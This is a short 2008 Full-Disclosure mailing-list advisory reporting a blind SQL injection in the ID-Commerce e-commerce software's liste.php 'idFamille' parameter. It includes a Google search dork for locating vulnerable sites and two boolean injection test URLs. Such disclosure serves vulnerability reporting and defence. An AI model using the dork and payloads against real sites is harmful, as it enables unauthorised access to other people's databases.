[Full-disclosure] ID-Commerce Security Advisory - SLR-2007-001
rlavertu
romain.lavertu at sogeti.com
Thu Jan 10 14:23:35 GMT 2008
Blind SQL injection :
google : inurl:'liste.php?idFamille='
http://URL/liste.php?idFamille=1%20or%201=1#
http://URL/liste.php?idFamille=1%20or%201=0#
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080110/f0072b98/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.